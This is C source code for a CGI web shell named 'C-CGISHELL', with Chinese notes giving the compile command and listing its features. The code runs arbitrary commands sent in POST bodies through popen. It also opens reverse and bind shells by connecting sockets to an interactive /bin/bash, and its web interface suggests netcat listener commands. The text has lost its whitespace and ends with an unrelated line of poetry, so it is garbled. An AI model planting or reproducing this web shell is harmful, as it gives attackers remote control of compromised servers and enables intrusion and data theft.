FILE*command;intsize=atoi(getenv(“CONTENT_LENGTH”));if(size 1500){printf(“Error PostDataisverybig”);exit(0);}char*buffer=malloc(size+1);fread(buffer,1,size,stdin);command=popen(buffer,”r”);charcaracter;while((caracter=fgetc(command))){if(caracter==EOF)break;printf(“%c”,caracter);}pclose(command);free(buffer);exit(0);interror(char*err){perror(err);exit(EXIT_FAILURE);voidparser_get(void){printf(“Content-type:text/html\n\n”);structget_data*s;char*GET=(char*)getenv(“QUERY_STRING”);inti,number_of_get=0,size_get=strlen(GET);if(strlen(GET) 100)exit(0);s=(structget_data*)malloc(number_of_get*sizeof(structget_data));intelement=0;intpositionA=0;intpositionB=0;intid=0;for(i=0;i size_get;i++){if(GET[i]==’=’){id=1;s[element].key[positionA]=’\0′;positionB=0;continue;}if(GET[i]==’ ‘){id=0;s[element].key[positionA]=’\0′;s[element].value[positionB]=’\0′;positionA=0;positionB=0;element++;continue;}if(id==0){s[element].key[positionA]=GET[i];positionA++;}if(id==1){s[element].value[positionB]=GET[i];positionB++;}if(i==size_get-1 GET[size_get-1]!=’ ‘){s[element].key[positionA]=’\0′;s[element].value[positionB]=’\0′;element++;continue;}}char*host_x=(char*)malloc(100);host_x=NULL;char*type_x=(char*)malloc(100);type_x=NULL;intport_x=0;for(i=0;i element;i++){if(strcmp(s[i].key,”type”)==0)type_x=s[i].value;elseif(strcmp(s[i].key,”host”)==0)host_x=s[i].value;elseif(strcmp(s[i].key,”port”)==0)port_x=atoi(s[i].value);}free(s);if(type_x==NULL){free(type_x);free(host_x);exit(0);}if((strcmp(type_x,””)==0)||port_x =0||port_x 65535){printf(“Somethingiswrong…!!!”);free(type_x);free(host_x);exit(0);}if((strcmp(type_x,”reverse”)==0) (strcmp(host_x,””)==0)){printf(“Youmustspecifyatargethost…”);free(type_x);free(host_x);exit(0);}if(strcmp(type_x,”reverse”)==0){structsockaddr_inaddr;intmsocket;msocket=socket(AF_INET,SOCK_STREAM,0);if(msocket 0){printf(” fontcolor=’red’ Failtocreatesocket /font free(host_x);free(type_x);exit(0);}addr.sin_family=AF_INET;addr.sin_port=htons(port_x);addr.sin_addr.s_addr=inet_addr(host_x);memset( addr.sin_zero,0,sizeof(addr.sin_zero));if(connect(msocket,(structsockaddr*) addr,sizeof(addr))==-1){printf(” fontcolor=’red’ Failtoconnect /font \n”);free(host_x);free(type_x);exit(0);}printf(” fontcolor=’006600′ Connectwithsucess!!! /font \n”);if(fork()==0){close(0);close(1);close(2);dup2(msocket,0);dup2(msocket,1);dup2(msocket,2);execl(“/bin/bash”,”bash”,”-i”,(char*)0);close(msocket);exit(0);}free(host_x);free(type_x);exit(0);}elseif(strcmp(type_x,”bind”)==0){intmy_socket,cli_socket;structsockaddr_inserver_addr,cli_addr;if((my_socket=socket(AF_INET,SOCK_STREAM,0))==-1){printf(” fontcolor=’red’ Failtocreatesocket /font exit(1);}server_addr.sin_family=AF_INET;server_addr.sin_port=htons(port_x);server_addr.sin_addr.s_addr=INADDR_ANY;bzero( (server_addr.sin_zero),8);intoptval=1;setsockopt(my_socket,SOL_SOCKET,SO_REUSEADDR, optval,sizeofoptval);if(bind(my_socket,(structsockaddr*) server_addr,sizeof(structsockaddr))==-1){printf(” fontcolor=’red’ Failtobind /font free(host_x);free(type_x);exit(1);}if(listen(my_socket,1) 0){printf(” fontcolor=’red’ Failtolisten /font free(host_x);free(type_x);exit(1);}else{printf(” fontcolor=’006600′ Listenonport%d /font \n”,port_x);}if(fork()==0){socklen_ttamanho=sizeof(structsockaddr_in);if((cli_socket=accept(my_socket,(structsockaddr*) cli_addr, tamanho)) 0){exit(0);}close(0);close(1);close(2);dup2(cli_socket,0);dup2(cli_socket,1);dup2(cli_socket,2);execl(“/bin/bash”,”bash”,”-i”,(char*)0);close(cli_socket);}}free(host_x);free(type_x);exit(0);voidload_css_js(void){printf(” styletype=\”text/css\” \n\#page-wrap{\n\margin:20pxauto;\n\width:750px;\n\h1{\n\font-family:Impact,Charcoal,sans-serif;\n\text-shadow:-1px0black,01pxblack,\n\1px0black,0-1pxblack;\n\color:gray;\n\border:#00ff00;\n\body{\n\background-color:white;\n\input[type=\”text\”]{\n\margin-bottom:10px;\n\border:1pxsolidgray;\n\color:black;\n\box-shadow:4px4px2px2pxrgba(50,50,50,0.75);\n\hr{\n\color:gray;\n\input[type=\”submit\”],input[type=\”button\”]{\n\margin-bottom:10px;\n\border:1pxsolidgray;\n\box-shadow:4px4px2px2pxrgba(50,50,50,0.75);\n\#bind_reverse{\n\display:none;\n\label{\n\position:relative;\n\clear:left;\n\float:left;\n\width:15em;\n\margin-right:5px;\n\text-align:right;\n\margin-top:5px;\n\div.scroll{\n\border:1pxsolidgray;\n\margin-bottom:10px;\n\color:black;\n\font-family:Tahoma,sans-serif;\n\padding:5px;\n\width:745px;\n\height:295px;\n\overflow:auto;\n\box-shadow:4px4px2px2pxrgba(50,50,50,0.75);\n\#cmd_rev{\n\position:absolute;\n\margin-left:450px;\n\top:150px;\n\width:250px;\n\overflow:auto;\n\#cmd_bin{\n\position:absolute;\n\margin-left:450px;\n\top:300px;\n\width:250px;\n\overflow:auto;\n\#rev_s{\n\display:inline;\n\#bind_s{\n\display:inline;\n\ /style \n\ scripttype=\”text/javascript\” \n\functionexec_cmd(){\n\varRrequest=newXMLHttpRequest();\n\varcmd_x=document.getElementById(\”xxx\”);\n\varresult=document.getElementById(\”result\”);\n\if(cmd_x.value==”)return;\n\if(cmd_x.value==’clear’||cmd_x.value==’reset’){result.innerHTML=”;return;}\n\varvv=cmd_x.value;\n\vv=vv.replace(/ /g,\” #60\”);\n\vv=vv.replace(/ /g,\” #62\”);\n\result.innerHTML+=\” pre b \\$ /b \”+vv+\” /pre \n\varbodyx=”;\n\Rrequest.open(\”POST\”,window.location.href,true);\n\Rrequest.setRequestHeader(\”Content-type\”,\”text/plain\”);\n\Rrequest.send(cmd_x.value);\n\Rrequest.onreadystatechange=function(){\n\if(Rrequest.status==200){\n\if(Rrequest.readyState==4||Rrequest.readyState==\”complete\”){\n\varcomplete_cont=Rrequest.responseText;\n\complete_cont=complete_cont.replace(/ /g,\” #60\”);\n\complete_cont=complete_cont.replace(/ /g,\” #62\”);\n\result.innerHTML+=’ pre ‘+complete_cont+’ /pre \n\result.scrollTop=result.scrollHeight;\n\}\n\}else{\n\if(Rrequest.readyState==4||Rrequest.readyState==\”complete\”){\n\result.innerHTML+=\” pre b error! /b /pre \n\returnfalse;\n\}\n\}\n\}\n\functionload_bind(){\n\varchange_link=document.getElementById(\”change_link\”);\n\varlinkz=change_link.innerHTML;\n\if(linkz==’REVERSE/BIND’){\n\change_link.innerHTML=\”COMMANDLINE\”;\n\document.getElementById(\”cmd_line\”).style.display=’none’;\n\document.getElementById(\”bind_reverse\”).style.display=’block’;\n\}\n\\n\else{\n\document.getElementById(\”bind_reverse\”).style.display=’none’;\n\document.getElementById(\”cmd_line\”).style.display=’block’;\n\change_link.innerHTML=’REVERSE/BIND’;\n\}\n\functionupdate_div(su,xxxd){\n\varstatus=document.getElementById(xxxd);\n\if(su.value==0||su.value==\”\”){\n\status.innerHTML=\”\”;\n\returnfalse;\n\}\n\if(xxxd==’cmd_rev’){\n\status.innerHTML=\” pre nc-v-l\”+su.value+\” /pre \n\returntrue;\n\}\n”);printf(“\tvarserver_ip=’%s’;\n”,getenv(“SERVER_ADDR”));printf(“\tstatus.innerHTML=\” pre nc-v\”+server_ip+\”\”+su.value+\” /pre \n\returntrue;\n\functionchange_div(ev,field){\n\if(ev.keyCode==8||ev.keyCode==37||\n\ev.keyCode==38||ev.keyCode==39||\n\ev.keycode==40||ev.keyCode==46){\n\returntrue;\n\}\n\if(ev.charCode 48||ev.charCode 57){\n\returnfalse;\n\}\n\\n\if(field.value 65535){\n\returnfalse;\n\}\n\returntrue;\n\functionconnect_xxx(div_t){\n\varget_s=”;\n\if(div_t==’rev_s’){\n\varhost_rev=document.getElementById(\”host_rev\”);\n\varport_rev=document.getElementById(\”port_rev\”);\n\if(host_rev.value==”||port_rev==”)returnfalse;\n\get_s=’/?type=reverse host=’+host_rev.value+’ port=’+port_rev.value;\n\}elseif(div_t==’bind_s’){\n\varport_bind=document.getElementById(\”port_bin\”);\n\if(port_bin.value==”)returnfalse;\n\get_s=’/?type=bind port=’+port_bin.value;\n\}\n\vartarget_div=document.getElementById(div_t);\n\target_div.innerHTML=\”Wait…\”;\n\varconnect_s=newXMLHttpRequest();\n\connect_s.open(\”GET\”,window.location.href+get_s,true);\n\connect_s.timeout=3000;\n\connect_s.ontimeout=function(){\n\target_div.innerHTML=\” fontcolor=’006600′ ListenOK!!! /font \”\n\connect_s.onreadystatechange=function(){\n\if(connect_s.status==200){\n\if(connect_s.readyState==4||connect_s.readyState==\”complete\”){\n\target_div.innerHTML=connect_s.responseText;\n\}\n\}else{\n\if(connect_s.readyState==4||connect_s.readyState==\”complete\”){\n\result.innerHTML+=\” b error! /b \n\returnfalse;\n\}\n\}\n\}\n\connect_s.send();\n\ /script intmain(void){if(strcmp(getenv(“REQUEST_METHOD”),”POST”)==0)exec_cmd();if(strcmp(getenv(“QUERY_STRING”),””)!=0)parser_get();printf(“Content-type:text/html\n\n”);printf(” html \n”);printf(“\t head \n\t metahttp-equiv=\”Content-type\”content=\”text/html;charset=UTF-8\” \n”);printf(“\t\t title CCGISHELL=D /title \n”);load_css_js();printf(“\n\t /head \n”);printf(“\t body \n”);printf(“\n\ divid=\”page-wrap\” \n\ h1 C-CGISHELL /h1 pre C0d3r: b webshell /b | aid=’change_link’href=’javascript:load_bind()’ REVERSE/BIND /a /pre \n\ divid=’cmd_line’ \n\ inputtype=\”text\” “width:300px;\”id=\”xxx\”onkeyup=\”if(event.keyCode==13)document.getElementById(‘lol’).click()\” \n\ inputid=\”lol\”type=\”button\”value=\”RunCommand\” “exec_cmd()\” br/ \n\ div “scroll\”id=’result’ /div \n\ /div \n\ divid=’bind_reverse’ \n\ pre b ReverseConnection: divid=’rev_s’ fontcolor=’red’ Stop /font /div /b /pre \n\ pre label Host/IP: /label inputtype=\”text\”id=’host_rev’/ /pre \n\ pre label Port: /label inputtype=\”text\”id=’port_rev’onkeypress=’returnchange_div(event,this);’onKeyUp=’update_div(this,\”cmd_rev\”);’/ /pre \n\ inputtype=’button’value=’StartConnection’ “margin-left:15.5em;\” “connect_xxx(‘rev_s’)\”/ \n\ divid=’cmd_rev’ /div \n\ hr \n\ pre b BindConnection: divid=’bind_s’ fontcolor=’red’ Stop /font /div /b /pre \n\ pre label PortToListen: /label inputtype=\”text\”id=’port_bin’ “width:50px\”onkeypress=’returnchange_div(event,this);’onKeyUp=’update_div(this,\”cmd_bin\”);’ /pre \n\ inputtype=’button’value=’StartConnection’ “margin-left:15.5em;\” “connect_xxx(‘bind_s’)\”/ \n\ divid=’cmd_bin’ /div \n\ /div \n\ /div \n\ /body \n\ /html \n\return0;}
编译:gcc shell.c -o shell.cgi功能:1.反弹获得shell(target作为客户端)
2.监听获得shell(target作为服务端)
3.命令行执行
酒般的思念,一饮就醉,醉时就用全部的热情读这忧伤的月色,
